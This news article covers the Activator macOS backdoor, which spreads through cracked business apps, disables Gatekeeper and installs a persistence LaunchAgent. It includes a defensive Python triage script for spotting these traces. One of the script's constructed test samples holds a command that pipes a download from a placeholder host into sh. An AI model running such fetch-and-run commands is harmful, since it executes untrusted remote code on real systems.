Security researchers have sounded the alarm on a new cyberattack campaign using cracked copies of popular software products to distribute a backdoor to macOS users.
What makes the campaign different from numerous others that have employed a similar tactic - such as one reported just earlier this month involving Chinese websites - is its sheer scale and its novel, multistage payload delivery technique.
Also noteworthy is the threat actor's use of cracked macOS apps with titles that are of likely interest to business users, so organizations that don't restrict what users download can be at risk as well.
Kaspersky was the first to discover and report on the Activator macOS backdoor in January 2024.
SentinelOne researcher Phil Stokes says the number of Activator backdoor samples his company has observed exceeds even the volume of macOS adware and bundleware loaders that are backed by large affiliate networks.
Many of the cracked apps have business-focused titles that could be of interest to individuals in workplace settings.
A sampling: Snag It, Nisus Writer Express, and Rhino-8, a surface modeling tool for engineering, architecture, automotive design, and other use cases.
Threat actors seeking to distribute malware via cracked apps typically embed the malicious code and backdoors within the app itself.
In the case of Activator, the attacker has employed a somewhat different strategy to deliver the backdoor.
Different Delivery Method
Unlike many macOS malware threats, Activator doesn't actually infect the cracked software itself, Stokes says.
The cracked app ships alongside a separate Activator app; users are instructed to copy both to the Applications folder and then run Activator.
Activator prompts for the administrator password and uses it to disable Gatekeeper, the macOS check that stops unsigned or un-notarized applications from outside Apple's App Store from launching, so that the downloaded software runs unchallenged.
It then carries out a series of further actions, among them turning off the system's notification setting and installing a Launch Agent for persistence.
The Activator backdoor itself is a first-stage installer and downloader for other malware.
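The sequence described above leaves two host artifacts a responder can check for: Gatekeeper assessments switched off and a freshly dropped LaunchAgent. The script below is an added example, not code from the article, from Kaspersky or from SentinelOne. It parses the output of `spctl --status` (which prints "assessments enabled" or "assessments disabled") and a LaunchAgent property list, and flags the indicators a triage would look for. The sample plists are constructed for the example, and the directory prefixes it treats as trusted or as staging locations are assumptions chosen for illustration, not values taken from the campaign.

```python
"""Triage checks for the post-infection state described in the article:
Gatekeeper disabled and a persistence LaunchAgent installed."""
import plistlib
import subprocess
import sys
from pathlib import Path

# Assumption for the example: where a legitimate LaunchAgent executable usually lives.
TRUSTED_EXEC_PREFIXES = ("/System/", "/usr/", "/bin/", "/sbin/", "/Applications/", "/Library/Apple/")
# Assumption for the example: user-writable locations malware often stages payloads in.
STAGING_PREFIXES = ("/tmp/", "/private/tmp/", "/var/tmp/", "/Users/Shared/")
# Interpreters whose presence as the agent's program, with an inline script, is worth flagging.
INTERPRETERS = {"sh", "bash", "zsh", "python", "python3", "osascript"}


def gatekeeper_disabled(spctl_status_output: str) -> bool:
    """True if the text from `spctl --status` reports that assessments are disabled."""
    return "assessments disabled" in spctl_status_output.strip().lower()


def launch_agent_findings(plist_bytes: bytes, home: str = "/Users/victim") -> list[str]:
    """Parse a LaunchAgent plist and return the reasons it looks suspicious (empty if none)."""
    agent = plistlib.loads(plist_bytes)
    findings: list[str] = []
    args = agent.get("ProgramArguments") or []
    program = agent.get("Program") or (args[0] if args else "")
    if not program:
        return ["no Program/ProgramArguments key"]
    program = program.replace("~", home, 1)
    if program.startswith(STAGING_PREFIXES) or program.startswith(home + "/Library/"):
        findings.append(f"executable in user-writable staging dir: {program}")
    elif not program.startswith(TRUSTED_EXEC_PREFIXES):
        findings.append(f"executable outside trusted prefixes: {program}")
    if agent.get("RunAtLoad") and agent.get("KeepAlive"):
        findings.append("RunAtLoad + KeepAlive: relaunched at every login and whenever it exits")
    base = Path(program).name
    if base in INTERPRETERS and any(a in ("-c", "-e") for a in args[1:]):
        findings.append(f"{base} runs an inline script: {' '.join(args[1:])[:80]}")
    return findings


# Constructed sample: payload staged in /Users/Shared, set to persist and self-restart.
SAMPLE_AGENT = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.updater</string>
  <key>ProgramArguments</key><array>
    <string>/Users/Shared/.update/helper</string><string>--silent</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict></plist>
"""

# Constructed sample: nothing on disk to scan, the agent pipes a download straight into sh.
INLINE_AGENT = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.inline</string>
  <key>ProgramArguments</key><array>
    <string>/bin/bash</string><string>-c</string>
    <string>curl -fsSL http://example.invalid/stage2 | sh</string>
  </array>
  <key>RunAtLoad</key><true/>
</dict></plist>
"""

# Constructed sample: an ordinary agent that should produce no findings.
BENIGN_AGENT = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.benign</string>
  <key>ProgramArguments</key><array><string>/Applications/Example.app/Contents/MacOS/agent</string></array>
  <key>RunAtLoad</key><true/>
</dict></plist>
"""


def scan_live_host() -> dict:
    """On a real Mac, run the same checks against `spctl --status` and ~/Library/LaunchAgents."""
    status = subprocess.run(["spctl", "--status"], capture_output=True, text=True).stdout
    report = {"gatekeeper_disabled": gatekeeper_disabled(status), "agents": {}}
    for plist in Path.home().joinpath("Library/LaunchAgents").glob("*.plist"):
        try:
            findings = launch_agent_findings(plist.read_bytes(), str(Path.home()))
        except Exception as exc:  # malformed or binary-but-corrupt plist
            findings = [f"unparseable plist: {exc}"]
        if findings:
            report["agents"][str(plist)] = findings
    return report


if __name__ == "__main__":
    for name, blob in (("staged", SAMPLE_AGENT), ("inline", INLINE_AGENT), ("benign", BENIGN_AGENT)):
        print(name, "->", launch_agent_findings(blob))
    if sys.platform == "darwin":
        print(scan_live_host())
```

Run it on the constructed samples anywhere; on macOS the `__main__` block also scans the live host. `plistlib.loads` handles both XML and binary plists, so the same function works on agents written with `defaults write`. Treat any finding as a lead to pivot on, not a verdict: an installer that legitimately drops a self-restarting agent outside the trusted prefixes will trip the same rules.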
Sergey Puzan, malware analyst at Kaspersky, points to another aspect of the Activator campaign that is noteworthy.
Puzan also believes that one potential goal of the threat actor behind this campaign is to build a macOS botnet.
Since Kaspersky's report on the Activator campaign, the company has not observed any additional activity, he adds.
This Cyber News was published on www.darkreading.com. Publication date: Fri, 02 Feb 2024 20:05:21 +0000